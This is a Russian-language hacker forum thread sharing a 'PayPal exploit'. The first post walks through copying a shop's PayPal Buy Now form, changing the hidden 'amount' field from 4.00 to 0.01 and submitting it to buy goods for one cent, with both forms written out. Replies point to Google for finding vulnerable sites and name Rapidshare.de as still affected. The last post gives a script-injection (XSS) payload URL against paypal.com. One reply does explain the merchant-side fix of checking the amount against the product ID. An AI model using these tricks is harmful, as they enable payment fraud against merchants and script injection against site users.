Уязвимости: PayPal

[Ŧ1LAN]

Paypal Exploit. - Wrote By novalok
Всё очень легко, лекгко до безобразия.
Вот пример:
Допустим вы хотите кпить какю-нибдуь вещицу с сайта www.site.com
и там есть paypal "кнопка". И вещь которую вы хотите купить стоит 4 бакса.
смотрим сорец:[New$paN]

<form method="post" action="http://www.site.com/process.php"> 
<input type="hidden" name="amount" value="4.00"> 
<input type="hidden" name="item_name" value="$4.00 Item"> 
<input type="hidden" name="item_number" value="1"> 
<input type="hidden" name="no_note" value="1"> 
<input type="hidden" name="currency_code" value="USD"> 
<input type="hidden" name="no_shipping" value="1"> 
<input type="hidden" name="quantity" value="1"> 
<input type="hidden" name="bn" value="PP-BuyNowBF"> 
<input type="hidden" name="cmd" value="_xclick"> 
<input type="image" src="http://www.paypal.com/en_US/i/btn/x-click-but01.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!"> 
</form>

копируем всё это в блокнот и сохраяем с расширением .html
Так теперь вы видете строку

<input type="hidden" name="amount" value="4.00">

я думаю понятно что это значит
так.. теперь маленько изменяем сорец "кнопочки"

<form method="post" action="http://www.site.com/process.php"> 
<input type="hidden" name="amount" value="00.01"> 
<input type="hidden" name="item_name" value="$4.00 Item"> 
<input type="hidden" name="item_number" value="1"> 
<input type="hidden" name="no_note" value="1"> 
<input type="hidden" name="currency_code" value="USD"> 
<input type="hidden" name="no_shipping" value="1"> 
<input type="hidden" name="quantity" value="1"> 
<input type="hidden" name="bn" value="PP-BuyNowBF"> 
<input type="hidden" name="cmd" value="_xclick"> 
<input type="image" src="http://www.paypal.com/en_US/i/btn/x-click-but01.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
</form>

мы отредактили вторую строку вот так:

<input type="hidden" name="amount" value="00.01">

и теперь просто нажимаем на кнопку и покупаем вещицу за 1 цент =)
З.Ы. тока боюсь прикроют довольно быстро.. зарегестрирвоать пайпал акк можно на http://paypal.com

 

[xPow]

ну это не баг в пейпале. и прикрывать тут нечего. это баг криворуких программеров, которые юзают мерчант!

передаем доп параметр: item_id ( и то он передается вродь: <input type="hidden" name="item_number" value="1">)
и в пост бек урле он прийдет вместе с суммой, которую мы заплатили и делаем проверку на айди продукта и соответсвующую стоимсоть.
имхо, но даже сейчас не везде такое работает!

с таким же успехом можно сказать, что есть баг в вебмани!

 

[Mail2k]

А сайтов таких с кнопочкой paypal много вообще?

 

[poiuy]

google прет

 

[yuppieszzz]

del

 

[wolfer]

да toha прав
это старый баг
почти уже нигде таких кнопок нету

 

[Mr.Lsth]

Одно радует на Rapidshare.de эти кнопочки ещё сушевствуют....

 

[nerezus]

У вебманей подобная система ) только вот там есть нюанс

 

[not null]

XSS on paypal.com

www.paypal.com/cgi-bin/webscr?cmd=p/gen/--></script><script>alert('XSS')</script>